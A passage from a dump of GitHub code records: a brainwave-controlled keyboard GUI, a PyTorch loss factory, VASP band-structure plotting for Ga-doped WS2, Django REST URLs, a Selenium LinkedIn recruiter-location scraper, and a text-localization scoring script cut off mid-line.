res+=str(timest)\n if x0!=x1:\n midx = (x0+x1)//2\n if(timest):\n x1 = midx\n else:\n x0 = midx+1\n elif y0!=y1:\n midy = (y0+y1)//2\n if(timest):\n y1 = midy\n else:\n y0 = midy+1\n\ndef draw_circle():\n global status # 使用 global 關鍵字來訪問外部的 status 變數\n canvas.delete(\"circle\") # 清除之前的圓點\n x = canvas.winfo_reqwidth() - 30 # 右上角 x 座標\n y = canvas.winfo_reqheight() - 30 # 右上角 y 座標\n\n if status == -1:\n canvas.create_oval(x, y, x + 20, y + 20, fill=\"red\", outline=\"red\", tags=\"circle\")\n elif status == 1:\n canvas.create_oval(x, y, x + 20, y + 20, fill=\"green\", outline=\"green\", tags=\"circle\")\n elif status == 2:\n canvas.create_oval(x, y, x + 20, y + 20, fill=\"gray\", outline=\"gray\", tags=\"circle\")\n\ndef read_output():\n global status\n reset()\n while True:\n output_line = process.stdout.readline()\n if not output_line:\n # continue\n break\n if output_line == \"PoorSignal\\n\":\n status = -1\n elif output_line == \"GreatSignal\\n\":\n status = 1\n elif output_line == \"Click!\\n\": \n status = 2\n click()\n draw()\n status = 2\n if x0==x1 and y0==y1:\n print(res)\n try:\n print(tab[res])\n except:\n print(\"Error\")\n reset()\n elif output_line == \"Cd_ends\\n\" and status != -1 :\n status = 1\n\n print(\"標準輸出:\", output_line, end=\"\")\n label_1.config(text=output_line)\n label_1.update()\n draw_circle()\n \n\nexe_path = \"main.exe\" ###\nprocess = subprocess.Popen(exe_path, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n\nwindow = tk.Tk()\nwindow.title('test')\nwindow.geometry('1260x600')\nwindow.configure(background='white')\n# print(\"hello!\")\n\n\n# 上方的文字區域\ntext_area = tk.Text(window, height=10, width=60)\ntext_area.pack(side=tk.TOP)\n\nmain_canva = tk.Canvas(window, width=900, height=360)\nmain_canva.pack(side=tk.BOTTOM)\n\n\n# 下方的圖片\nimage = PhotoImage(file=\"keyborad.png\")\nimage_item = main_canva.create_image(450,200,image=image) # 圖片正中間 x = 450,y = 200\n\nrectg = main_canva.create_rectangle(60, 100, 845, 300, outline=\"blue\", width=4,tags=\"rectangle\")\n# 一格是 78.5 px (x) 50 px (y)\n\ndef reset():\n global res,x0,y0,x1,y1\n res = \"\"\n x0 = 0\n y0 = 0\n x1 = 9\n y1 = 3\ndef draw():\n global x0,y0,x1,y1\n main_canva.delete(\"rectangle\")\n rectg = main_canva.create_rectangle(60+x0*78.5, 100+y0*50, 845-(9-x1)*78.5, 300-(3-y1)*50, outline=\"blue\", width=4,tags=\"rectangle\")\n\n\n# main_canva.tag_raise(rectg)\n\nframe_1 = tk.Frame(window)\nframe_1.pack(side=tk.BOTTOM, anchor=tk.SE)\n\nlabel_1 = tk.Label(frame_1, text='OUTPUT')\nlabel_1.pack(side=tk.TOP)\n\ncanvas = tk.Canvas(frame_1, width=30, height=30) # 創建一個小的 Canvas 來放置圓點\ncanvas.pack(side=tk.TOP)\ndraw_circle() # 初始繪製圓點\n\nframe_2 = tk.Frame(window)\n\ndef mainloop_with_catch():\n try:\n window.mainloop()\n except KeyboardInterrupt:\n window.destroy()\n # 等待子進程完成\n process.wait()\n # 獲取子進程的退出碼\n exit_code = process.returncode\n print(\"退出碼:\", exit_code)\n\n# 創建一個全局變數來標識子進程是否已完成\nprocess_completed = False\n\n# 啟動子進程讀取輸出\nt = threading.Thread(target=read_output)\nt2 = threading.Thread(target=split)\nt.start()\nt2.start()\n\nmainloop_with_catch()\n\n# 等待子進程完成\nwhile not process_completed:\n pass\n","repo_name":"fishhh0710/YTP_mindwave","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18137244582","text":"import torch as th\nfrom .dice import DiceLoss\n\ndef create_loss(args):\n name = args.loss.lower()\n\n if name == 'l1':\n from torch.nn import L1Loss\n loss = L1Loss(reduction='sum')\n\n elif name == 'l2':\n from torch.nn import MSELoss\n loss = MSELoss(reduction='sum')\n\n elif name == 'bce':\n from torch.nn import BCELoss\n loss = BCELoss(reduction='sum')\n \n elif name == 'diceloss':\n loss = DiceLoss()\n else:\n raise ValueError('loss must be one of l1, l2, bce,diceloss')\n\n return loss\n\n# def dice_loss(probs,target):\n# \"\"\"\n# input is a torch variable of size BatchxnclassesxHxWxD representing log probabilities for each class\n# target is a 1-hot representation of the groundtruth, shoud have same size as the input\n# \"\"\"\n# eps = 1e-6\n# dims = (2,3,4)\n\n# intersection = th.sum(probs*target,dims)\n# cardinality = th.sum(probs+target,dims)\n# dice_score = 2. * intersection/(cardinality+eps)\n# return th.mean(1-dice_score)","repo_name":"nickioan/pytorch_network_architectures","sub_path":"loss/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"27387218538","text":"# Anthony Yoshimura\n# 09/03/18\n\nfrom numpy import arange, array, zeros, cross, dot, pi, transpose, sort, append\nfrom numpy.linalg import norm\nfrom getChemForm import getChemForm\nimport matplotlib.pyplot as plt \nimport os\nfrom plotBS import getFermiEnergy, getRecipLattice, getBandGap\nfrom plotEnCon import getPaths\n\nblue_list = [(1, .5, 0), (.2, .2, 1), (.2, .2, .8), (.2, .2, .6), (.2, .2, .4)] \n\ndef getDirectories(targFiles = ['EIGENVAL', 'POSCAR', 'DOSCAR'], top = '.'):\n \"\"\"\n returns a list of directories that contain desired files\n file_list: list of files that directories must contain (list of str)\n \"\"\"\n if type(targFiles) == str:\n targFiles = [targFiles]\n\n dir_list = []\n for root, dirs, files in os.walk(top):\n soFarSoGood = True\n for targFile in targFiles:\n if targFile not in files: \n soFarSoGood = False\n break\n if soFarSoGood:\n dir_list.append(root)\n\n return dir_list\n\n\ndef getEigenvalTab(\n EIGENVAL = 'EIGENVAL',\n DOSCAR = 'DOSCAR',\n kpoint = [1/3, 1/3, 0],\n printInfo = False,\n atomsPerCell = 3,\n walk = True,\n ):\n \"\"\"\n returns table containing number of atoms and eigenvalues at specified k-point \n EIGENVAL: EIGENVAL file (str)\n POSCAR: POSCAR file (str)\n DOSCAR: DOSCAR file (str)\n kpoint: k-point at which eigenvalues are read (list of 3 floats)\n printInfo: if True, prints band gaps and Fermi energies as they are read (bool)\n \"\"\"\n # get paths for EIGENVAL, POSCAR, and DOSCARs\n if walk:\n EIGENVAL_list = getPaths(EIGENVAL)\n DOSCAR_list = getPaths(DOSCAR)\n else:\n EIGENVAL_list = [EIGENVAL]\n DOSCAR_list = [DOSCAR]\n\n # get eigenvalues belonging to desired k-point from EIGENVALs\n eigenval_tab = []\n for EIGENVAL, DOSCAR in zip(EIGENVAL_list, DOSCAR_list):\n\n # get Fermi energies from DOSCAR\n with open(DOSCAR) as f:\n efermi = getFermiEnergy(DOSCAR, printInfo = False)\n\n # get eigenvalues from EIGENVAL\n if printInfo:\n print('getting eigenvalues from %s' %EIGENVAL)\n with open(EIGENVAL) as f:\n\n # get number of atoms and bands\n natoms = int(f.readline().split()[0])\n if natoms < 4:\n natoms = 0 # zero Ga atoms in pristine cell\n\n for n in range(4):\n f.readline()\n nelect, nkpts, nbands = [int(val) for val in f.readline().split()]\n if printInfo:\n print('nelect = %s, natoms = %s, nbands = %s' %(nelect, natoms, nbands))\n\n # if more than k-point was used, find point closest to the desired k-point\n if nkpts > 1:\n for line in f:\n line_list = line.split()\n if len(line_list) == 4:\n trialKpoint = [float(val) for val in line_list[:-1]]\n \n # check if it's the correct k-point\n match = True \n for desiredComp, trialComp in zip(kpoint, trialKpoint):\n dif = abs(desiredComp - trialComp)\n if abs(desiredComp - trialComp) > 0.001:\n match = False\n break\n \n # break from loop when k-point is found\n if match:\n break\n\n # if only one k-point was used\n else:\n f.readline()\n line_list = f.readline().split()[:-1]\n trialKpoint = [float(val) for val in line_list[:-1]]\n\n if printInfo:\n print('taking eigenvalues at %s' %trialKpoint)\n \n # get eigenvalues\n eigenval_list = [float(f.readline().split()[1]) for n in range(nbands)]\n \n # add to eigenvalue table\n eigenval_tab.append((int(natoms / atomsPerCell), eigenval_list, efermi))\n\n return eigenval_tab\n \n\ndef getBars(\n ebounds = [-4, 0.75],\n kpoint = [1/3, 1/3, 0],\n printInfo = False,\n thres = 0.3628, #eV (default for Ga-doping project)\n getPris = True,\n prisRoot = '/Users/anthonyyoshimura/Desktop/meunier/ionIrrad/tmd/WS2_optb88/bands',\n ):\n \"\"\"\n returns dictionary of energy ranges for bars representing vbm, cbm, and midgap states\n EIGENVAL: EIGENVAL file (str)\n POSCAR: POSCAR file (str)\n DOSCAR: DOSCAR file (str)\n kpoint: k-point at which eigenvalues are read (list of 3 floats)\n printInfo: if True, prints band gaps and Fermi energies as they are read (bool)\n thres: threshold for gap in eV (float)\n getPris: if True, gets energy ranges from pristine system\n root: directory containing VASP output files for pristine system\n \"\"\"\n eigenval_tab = getEigenvalTab('EIGENVAL', 'DOSCAR', kpoint, printInfo)\n emin, emax = ebounds\n emax += 1.5 # make sure conduction band goes above top of plot\n\n # get eigenvalues from pristine system\n if getPris:\n EIGENVAL = '%s/%s' %(prisRoot, 'EIGENVAL')\n DOSCAR = '%s/%s' %(prisRoot, 'DOSCAR')\n eigenval_tab += getEigenvalTab(EIGENVAL, DOSCAR, kpoint, printInfo, walk = False)\n \n # get all eigenvalues below top directory\n bar_dict = {}\n for natoms, eigenval_list, efermi in eigenval_tab:\n\n # use larger thres for pristine system\n if natoms == 0:\n thres = 1.6\n\n # find of energy ranges in which eigenvalues are closely spaced\n top_list = []\n bot_list = [emin]\n for n in range(len(eigenval_list) - 1):\n thisEig = eigenval_list[n]\n nextEig = eigenval_list[n + 1]\n\n # only look at eigenvalues within ebounds\n if thisEig > emin and thisEig < emax:\n if nextEig - thisEig > thres:\n top_list.append(thisEig)\n bot_list.append(nextEig)\n \n # restore original threshold value\n if natoms == 0:\n thres -= 1.5\n\n top_list.append(emax)\n \n bar_dict[natoms] = top_list, bot_list, efermi\n\n return bar_dict\n\n\ndef getEdges(\n ebounds = [-4, 0.75],\n thres = 0.1356, #eV (default for Ga-doping project)\n printInfo = False,\n getPris = True,\n prisRoot = '/Users/anthonyyoshimura/Desktop/meunier/ionIrrad/tmd/WS2_optb88/bands',\n ):\n \"\"\"\n returns dictionary containing band edges in eV within deired energy range\n EIGENVAL: EIGENVAL file (str)\n POSCAR: POSCAR file (str)\n DOSCAR: DOSCAR file (str)\n thres: threshold for gap in eV (float)\n getPris: if True, gets energy ranges from pristine system\n root: directory containing VASP output files for pristine system\n \"\"\"\n # get list of directories containing required files\n root_list = getDirectories(targFiles = ['EIGENVAL', 'DOSCAR'], top = '.')\n\n # get pristine band edges\n if getPris:\n root_list.append(prisRoot)\n\n # dictionary containing edge values\n edge_dict = {}\n\n # loop through root directories\n for root in root_list:\n DOSCAR = '%s/DOSCAR' %root\n EIGENVAL = '%s/EIGENVAL' %root\n\n # get Fermi level from DOSCAR\n efermi = getFermiEnergy(DOSCAR, printInfo = False)\n \n # obtain eigenvalues along k-path from EIGENVAL\n if printInfo:\n print('getting eigenvalues from %s' %EIGENVAL)\n\n with open(EIGENVAL, 'r') as f:\n \n # get number or atoms and bands\n natoms = int(int(f.readline().split()[0]) / 3)\n if natoms < 4:\n natoms = 0\n print('natoms = %s' %natoms)\n\n for i in range(4): # useful info starts at line 6\n f.readline()\n \n # number of electrons, kpoints, and bands\n nelect, nkpts, nbands = [int(val) for val in f.readline().split()]\n if printInfo:\n print('nelect = %s, natoms = %s, nbands = %s' %(nelect, natoms, nbands))\n \n # place holders\n eigenval_tab = [] # lists of eigenvalues at every kpoint\n \n # get eigenvalues and kpath distances\n for i in range(nkpts):\n for n in range(2): # skips k-points lines before eigenvals\n f.readline()\n \n # record eigenvalues at current kpoint\n eigenval_list = []\n for j in range(nbands):\n eigenval = float(f.readline().split()[1])\n eigenval_list.append(eigenval)\n \n eigenval_tab.append(eigenval_list)\n \n # transpose table into list of bands to plot in pyplot\n band_tab = transpose(eigenval_tab)\n \n # find band maxima and minima\n max_list = array([band.max() for band in band_tab])\n min_list = array([band.min() for band in band_tab])\n \n # find all bands in ebounds\n lowerBound, upperBound = ebounds\n \n # find lowest band in ebounds\n for index, en in enumerate(min_list):\n if en > lowerBound:\n lowestIndex = index\n break\n \n # find highest band in ebounds\n for index, en in enumerate(reversed(max_list)):\n if en < upperBound:\n highestIndex = nbands - index\n break\n if highestIndex == nbands:\n highestIndex -= 1 # ensure that search for cbm stays in bounds of min_list\n \n # find highest cbm and lowest vbm\n if printInfo:\n print('searching for gap in bands %s through %s' %(lowestIndex, highestIndex))\n top_list = [] # top of band (bottom of gap)\n bot_list = [] # bottom of band (top of gap)\n for index in range(lowestIndex, highestIndex):\n vbm = max_list[index]\n cbm = min_list[index + 1]\n bandgap = cbm - vbm\n if bandgap > thres:\n if printInfo:\n print('found gap of size %s eV above band %s' %(bandgap, index))\n top_list.append(vbm)\n bot_list.append(cbm)\n \n vbm, cbm = min(top_list), max(bot_list)\n print('vbm = %s, cbm = %s' %(vbm, cbm))\n edge_dict[natoms] = vbm, cbm\n\n return edge_dict\n\n\ndef getGaps(\n bar_dict,\n edge_dict,\n ):\n \"\"\"\n returns dictionary containing band gaps in eV within deired energy range\n bar_dict: output of getBars (dict)\n edge_dict: output of getEdges (dict)\n \"\"\"\n gap_dict = {}\n\n for natoms in bar_dict:\n top_list, bot_list, efermi = bar_dict[natoms]\n vbm, cbm = edge_dict[natoms]\n\n # get indirect gap\n indGap = cbm - vbm\n\n # find top closest to vbm\n minDist = indGap\n for top in top_list:\n dif = abs(vbm - top)\n if dif < minDist:\n minDist = dif\n dVbm = top\n\n # find bottom closest to cbm\n minDist = indGap\n for bot in bot_list:\n dif = abs(cbm - bot)\n if dif < minDist:\n minDist = dif\n dCbm = bot\n \n # get direct gap\n dGap = dCbm - dVbm\n\n gap_dict[natoms] = dGap, indGap\n\n return gap_dict\n\n\ndef plotBars(\n ebounds = [-4, 0.75],\n kpoint = [1/3, 1/3, 0],\n printInfo = False,\n showFermi = True,\n showGaps = True,\n barThres = 0.3628, # eV (default for Ga-doping project)\n edgeThres = 0.1356,\n color_list = 'auto',\n width = 0.9,\n figsize = [6,5],\n save = False,\n outfile = 'bars.pdf',\n ):\n \"\"\"\n plots eigenvalues for various concentrations\n kpoint: k-point at which eigenvalues are read (list of 3 floats)\n printInfo: if True, prints band gaps and Fermi energies as they are read (bool)\n showFermi: if True, fermi levels are plotted as black dashed lines (bool)\n showGaps: if True, gap values are shown underneath the cbm's (bool)\n barThres: energy threshold above which an unoccupied region is considered a gap (float)\n edgeThres: energy threshold above which an unoccupied region is considered a gap (float)\n \"\"\"\n # UNDER CONSTRUCTION:\n # * length of faded bar extensions and positions of gap values\n # depend on edgeThres, which shouldn't be the case!\n # * gaps and concentrations should round with correct number of\n # sig figs. Right now it is tailored to work for G a-doping\n bar_dict = getBars(ebounds, kpoint, printInfo, barThres)\n edge_dict = getEdges(ebounds, edgeThres, printInfo) # small thres to count all gaps\n gap_dict = getGaps(bar_dict, edge_dict)\n numBars = len(bar_dict)\n\n # sort number of atoms corresponding to ascending Ga concentration\n natoms_list = [natoms for natoms in bar_dict]\n natoms_list.sort(reverse = True)\n natoms_list.insert(0, natoms_list.pop(-1))\n\n # label bars with Ga concentration %\n label_list = []\n for natoms in natoms_list:\n if natoms == 0:\n label_list.append('0.00')\n else:\n label = str(100 / natoms)\n label += '000'\n label_list.append('%.4s' %label)\n \n # prepare figure\n fig, ax = plt.subplots()\n \n # plot bars and edges labelled by ascending Ga concentration\n for natoms, n in zip(natoms_list, range(numBars)):\n\n print('natoms = %s' %natoms)\n\n # plot bars\n top_list, bot_list, efermi = bar_dict[natoms]\n\n # same color for each concentration\n if color_list == 'auto':\n barColor = next(ax._get_lines.prop_cycler)['color']\n else:\n barColor = color_list[n]\n \n # plot bars\n for top, bot in zip(top_list, bot_list):\n print('bot = %s, top = %s' %(bot, top))\n ax.bar(left = n, height = top - bot, width = width + .05, bottom = bot,\n color = barColor)\n\n # plot edges if they are significantly different from a bar's edge\n vbm, cbm = edge_dict[natoms]\n endPointsX = [n - width/2, n + width/2]\n barEdges_list = top_list + bot_list\n\n # check if indirect gap is significatnly smaller than bars' gap\n tracker = 0 # distinguish vbm from cbm\n for bandEdge in [vbm, cbm]:\n tracker += 1\n significant = True\n for barEdge in barEdges_list:\n dif = abs(bandEdge - barEdge)\n if dif < 0.01:\n significant = False\n break\n\n # plot faded extension to bar showing true band edge\n if significant:\n if tracker % 2 == 0:\n print('plotting a cbm extension')\n bot, top = bandEdge, bandEdge + 0.5\n\n else:\n print('plotting a vbm extension')\n bot, top = bandEdge - 0.5, bandEdge\n\n ax.bar(left = n, height = top - bot, width = width + .05, bottom = bot,\n color = barColor, zorder = -1, alpha = .4)\n\n # plot fermi levels\n if showFermi:\n endPointsY = [efermi, efermi]\n ax.plot(endPointsX, endPointsY, color = 'red', linewidth = 2, linestyle = 'dashed')\n\n # show band gap values\n if showGaps:\n dGap, indGap = gap_dict[natoms]\n xpos = n\n ypos = cbm - .05\n text = '%.3g eV' %dGap\n\n if abs(dGap - indGap) > 0.05:\n text = '%.3g (%.4s)' %(dGap, indGap)\n ax.text(xpos, ypos, text, va = 'top', ha = 'center', fontsize = 11)\n\n # figure properties\n ax.set_ylim(ebounds)\n# ax.set_title('Energy bands at K in Ga-doped WS$_2$', fontsize = 14)\n ax.set_xlabel('Ga Concentration (%)', fontsize = 12)\n ax.set_ylabel('Energy (eV)', fontsize = 12)\n ax.set_xticks(arange(numBars))\n ax.set_xticklabels(label_list, fontsize = 12)\n\n plt.tight_layout()\n if save:\n plt.savefig(outfile)\n\n plt.show()\n\n\ndef plotPoints(\n ebounds = [-4, 0.75],\n EIGENVAL = 'EIGENVAL',\n DOSCAR = 'DOSCAR',\n kpoint = [1/3, 1/3, 0],\n printInfo = True,\n scale = 'linear',\n save = False,\n outfile = 'eigevalues.pdf',\n ):\n \"\"\"\n plots eigenvalues for various concentrations\n EIGENVAL: EIGENVAL file (str)\n POSCAR: POSCAR file (str)\n DOSCAR: DOSCAR file (str)\n kpoint: k-point at which eigenvalues are read (list of 3 floats)\n printInfo: if True, prints band gaps and Fermi energies as they are read (bool)\n \"\"\"\n eigenval_tab = getEigenvalTab(EIGENVAL, DOSCAR, kpoint, printInfo)\n root = '/Users/anthonyyoshimura/Desktop/meunier/ionIrrad/tmd/WS2_optb88/bands'\n EIGENVAL = '%s/%s' %(root, EIGENVAL)\n DOSCAR = '%s/%s' %(root, DOSCAR)\n prisEigenval_tab = getEigenvalTab(EIGENVAL, DOSCAR, kpoint, printInfo, walk = False)\n eigenval_tab += prisEigenval_tab\n\n fig, ax = plt.subplots()\n \n for natoms, eigenval_list in eigenval_tab:\n \n print('natoms = %s' %natoms)\n if natoms > 0:\n con_list = [100/natoms for n in range(len(eigenval_list))] \n else:\n con_list = [0 for n in range(len(eigenval_list))]\n\n ax.plot(con_list, eigenval_list, 'bo')\n\n if scale == 'log':\n ax.set_xscale(\"log\", nonposx='clip')\n ax.set_ylim(ebounds)\n ax.set_title('Eigenvalues at K in Ga-doped WS$_2$', fontsize = 14)\n ax.set_xlabel('Ga concentration (%)', fontsize = 12)\n ax.set_ylabel('eigenvalues (eV)', fontsize = 12)\n\n if save:\n plt.savefig(outfile)\n\n plt.show()\n \n#------------------------------- SCRATCH ---------------------------------------------\n # get Fermi energies from DOSCARs\n# efermi_list = [getFermiEnergy(DOSCAR) for DOSCAR in DOSCAR_list]\n\n # print('dif = %s' %dif)\n# eigenval_dict[EIGENVAL.split('/')[1]] = natoms, eigenval_list\n\n # find band whose maxima is closest to but less than the fermi energy\n# vbDif = max_list.max() - min_list.min()\n# for en in max_list:\n# newVbDif = efermi - en\n# if newVbDif > 0:\n# vbDif = newVbDif\n# vbm = en\n# else:\n# break\n#\n# # find band index that contains vbm\n# vbmBand = max_list.tolist().index(vbm)\n \n#def getPrisBars(\n# ebounds = [-4, 1.75],\n# EIGENVAL = 'EIGENVAL',\n# DOSCAR = 'DOSCAR',\n# kpoint = [1/3, 1/3, 0],\n# printInfo = True,\n# thres = 0.3, #eV\n# ):\n# \"\"\"\n# gets energy ranges for bars representing vbm, cbm, and midgap states\n# EIGENVAL: EIGENVAL file (str)\n# POSCAR: POSCAR file (str)\n# DOSCAR: DOSCAR file (str)\n# kpoint: k-point at which eigenvalues are read (list of 3 floats)\n# printInfo: if True, prints band gaps and Fermi energies as they are read (bool)\n# thres: threshold for gap in eV (float)\n# \"\"\"\n# root = '/Users/anthonyyoshimura/Desktop/meunier/ionIrrad/tmd/WS2_optb88/bands'\n## EIGEVAL = '~/Desktop/meunier/ionIrrad/tmd/WS2_optb88/bands/%s' %EIGENVAL\n## EIGEVAL = '~/Desktop/meunier/ionIrrad/tmd/WS2_optb88/bands/%s' %EIGENVAL\n# EIGENVAL = '%s/%s' %(root, EIGENVAL)\n# DOSCAR = '%s/%s' %(root, DOSCAR)\n# eigenval_tab = getEigenvalTab(EIGENVAL, DOSCAR, kpoint, printInfo, walk = False)\n# \n# emin, emax = ebounds\n#\n# top_tab = []\n# bot_tab = []\n# natoms_list = []\n# bar_dict = {}\n# for natoms, eigenval_list in eigenval_tab:\n## for natoms in eigenval_tab:\n## eigenval_list = eigenval_tab[natoms]\n#\n# # find of energy ranges in which eigenvalues are closely spaced\n# top_list = []\n# bot_list = [emin]\n# for n in range(len(eigenval_list) - 1):\n# thisEig = eigenval_list[n]\n# nextEig = eigenval_list[n + 1]\n# if thisEig > emin and thisEig < emax:\n# if nextEig - thisEig > thres:\n# top_list.append(thisEig)\n# bot_list.append(nextEig)\n#\n# top_list.append(emax)\n# top_tab.append(top_list)\n# bot_tab.append(bot_list)\n# natoms_list.append(natoms)\n# \n# bar_dict[0] = top_list, bot_list\n#\n## return top_tab, bot_tab, natoms_list, bar_dict\n# return bar_dict\n#\n#\n\n# color = barColor, zorder = -1, alpha = .4, edgecolor = barColor)\n# endPointsY = [bandEdge, bandEdge]\n# ax.plot(endPointsX, endPointsY, color = barColor, linewidth = 2)\n\n# color = barColor, edgecolor = barColor)\n\n# elif natoms > 10:\n# label_list.append('%.4s' %(100 / natoms))\n# else:\n# label_list.append('%.3s' %(100 / natoms)) # hide trailing decimal\n","repo_name":"yoshimuraanthony/vasp","sub_path":"plotEigenvals.py","file_name":"plotEigenvals.py","file_ext":"py","file_size_in_byte":20858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2563739921","text":"from asset import rest_views\nfrom rest_framework import routers\nfrom asset import views as asset_views\nfrom django.conf.urls import url, include\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', rest_views.UserViewSet)\nrouter.register(r'assets', rest_views.AssetViewSet)\nrouter.register(r'servers', rest_views.ServerViewSet)\n\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'asset_list/$', rest_views.AssetList),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n url(r'^dashboard_data/', asset_views.get_dashboard_data, name=\"get_dashboard_data\"),\n]\n","repo_name":"a-mac-user/Ragtime","sub_path":"asset/rest_urls.py","file_name":"rest_urls.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"70572511404","text":"from collections import defaultdict\nimport pandas as pd\nimport numpy as np\nfrom time import sleep\nimport glob\nimport os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nimport chromedriver_binary\nfrom bs4 import BeautifulSoup\n\nimport mongo\nfrom companies import cos_list\n# import scroll\n\ndef get_login():\n '''\n Access keys from external file and placed in a list.\n\n Parameters\n ----------\n None:\n\n Returns\n ----------\n creds: (list)\n Return keys used for session.\n '''\n f = open('../data/LI_login.txt', 'r')\n creds = f.readlines()\n\n for idx, key in enumerate(creds):\n creds[idx] = key.replace('\\n', '')\n\n return creds\n\ndef login():\n '''\n Login into LinkedIn and webdriver session for more web manipulation.\n Keys generated from get_login() function.\n\n Parameters\n ----------\n None:\n\n Returns\n ----------\n driver: (selenium.webdriver.chrome.webdriver.WebDriver)\n Return webdriver session for web manipulation.\n '''\n # session keys for LI instance\n email, pw = get_login()\n \n # selenium webdriver\n driver = webdriver.Chrome()\n driver.get('https://www.linkedin.com/')\n # log in\n sleep(2)\n driver.find_element_by_id('session_key').send_keys(email)\n sleep(1)\n driver.find_element_by_id('session_password').send_keys(pw+Keys.RETURN)\n\n return driver\n\ndef scrape_location(driver, url, frame=None):\n '''\n Go to LinkedIn user's URL and scrape work location.\n \n Parameters\n ----------\n driver: (selenium.webdriver.chrome.webdriver.WebDriver)\n Selenium Chrome Webdriver for site interaction.\n url: (str)\n LinkedIn user's URL.\n\n Returns\n ----------\n location: (str)\n Return string of LinkedIn user's work location.\n '''\n sleep(5)\n # frame.to_csv('../data/tech_rec/_techrecruiters_with_location.csv', mode='a', index=False)\n # sleep(3)\n driver.get(url)\n r = driver.page_source\n soup = BeautifulSoup(r, 'html.parser')\n flex_card = soup.find('div', 'flex-1 mr5')\n try:\n location = flex_card.find('li', 't-16 t-black t-normal inline-block')\n if location == None:\n return 'Information not provided.'\n except:\n return '404'\n location = location.text.lstrip().rstrip()\n # frame['location'].append(location, ignore_index=True)\n sleep(3)\n # frame.to_csv('../data/techrecruiters_with_location.csv', mode='a')\n\n return location\n\ndef main():\n '''\n Open local CSVs into one DataFrame, scrape LinkedIn users work location and \n append to original Dataframe. Save new DataFrame to local CSV.\n\n Parameters\n ----------\n None:\n\n Returns\n ----------\n None:\n '''\n path = '../data/tech_rec'\n all_files = glob.glob(path + \"/*.csv\")\n csv_name = '../data/tech_rec/_techrecruiters_with_location.csv'\n lst = []\n # scroll.main()\n \n #TODO: functionize\n for filename in all_files:\n df = pd.read_csv(filename, index_col=None, header=0, names=['recruiter', 'url'])\n co_name = filename\n co_name = co_name.split('/')[-1]\n co_name = co_name[:-4]\n df['co_name'] = co_name\n lst.append(df)\n \n frame = pd.concat(lst, axis=0, ignore_index=True)\n frame['location'] = ''\n df = pd.DataFrame(columns=frame.columns)\n\n if not os.path.exists(csv_name):\n df.to_csv(csv_name, index=False)\n\n driver = login()\n #TODO: functionize\n for idx, row in frame[2202:3200].iterrows():\n location = scrape_location(driver, row['url'])\n row['location'] = location\n df = df.append(row)\n print(df.loc[idx:])\n df.loc[idx:].to_csv(csv_name, mode='a', index=False, header=False)\n \n driver.close()\n\nif __name__ == '__main__':\n main()","repo_name":"DatamancerZKSB/gal-career-partners","sub_path":"src/tech_rec_location.py","file_name":"tech_rec_location.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17142321350","text":"import argparse\nimport os\nfrom scoring_utils import get_score, get_mar_transcription_mapping\nfrom glob import glob\nimport numpy as np\n\nparser = argparse.ArgumentParser(\n description='scoring script for text localization')\nparser.add_argument('reference', type=str,\n help='reference directory of test data, contains np array')\nparser.add_argument('hypothesis', type=str,\n help='hypothesis directory of test data, contains np array')\nparser.add_argument('result', type=str,\n help='the file to store final statistical results')\nparser.add_argument('--mar-text-mapping', type=str, default=None,\n help=\"If not none, map hypothesis mar with the transciptions.\"\n \"A hypothesis box is mapped with the transcription \"\n \"of reference box that had the largest IoU overlap.\"\n \"The variable will provide the path of the reference \" \n \"file containing mapping between mar and text\")\nparser.add_argument(\"--score-mar\", action=\"store_true\",\n help=\"If true, score after finding the minimum area rectangle\"\n \" derived from the object mask. If false, score based on\" \n \" object mask without further processing.\")\nargs = parser.parse_args()\n\ndef main():\n threshold_list = [0.50, 0.55, 0.60, 0.65, 0.70, 0.75, 0.80, 0.85, 0.90, 0.95]\n if args.score_mar:\n ref_dict = read_rect_coordinates(args.reference)\n hyp_dict = read_rect_coordinates(args.hypothesis)\n else:\n ref_dict, hyp_dict = get_filenames_from_directory()\n\n mean_ap, mean_ar, stat_dict = get_mean_avg_scores(\n threshold_list, ref_dict, hyp_dict)\n\n write_stats_to_file(mean_ap, mean_ar, stat_dict)\n if args.mar_text_mapping:\n mapping_file = os.path.join(args.result, 'mar_transcription_mapping.txt')\n with open(mapping_file, 'w') as mapping_fh:\n ref_dict = read_rect_coordinates_and_transcription(args.mar_text_mapping)\n hyp_dict = read_rect_coordinates(args.hypothesis)\n for image_id in hyp_dict:\n ref_rect_transcription_lineid_list = list()\n for line_id in ref_dict[image_id]:\n ref_rect_transcription = ref_dict[image_id][line_id]\n ref_lineid_rect_transcription = ref_rect_transcription + (line_id,)\n ref_rect_transcription_lineid_list.append(ref_lineid_rect_transcription)\n for hyp_rect in hyp_dict[image_id]:\n ref_rect_transcription_lineid, best_index = get_mar_transcription_mapping(\n ref_rect_transcription_lineid_list, hyp_rect)\n line_id = ref_rect_transcription_lineid[2]\n transcription = ref_rect_transcription_lineid[1]\n hyp_mar = str()\n hyp_mar = str(int(hyp_rect[0]))\n hyp_mar = hyp_mar + ',' + str(int(hyp_rect[1]))\n hyp_mar = hyp_mar + ',' + str(int(hyp_rect[2]))\n hyp_mar = hyp_mar + ',' + str(int(hyp_rect[3]))\n hyp_mar = hyp_mar + ',' + str(int(hyp_rect[4]))\n hyp_mar = hyp_mar + ',' + str(int(hyp_rect[5]))\n hyp_mar = hyp_mar + ',' + str(int(hyp_rect[6]))\n hyp_mar = 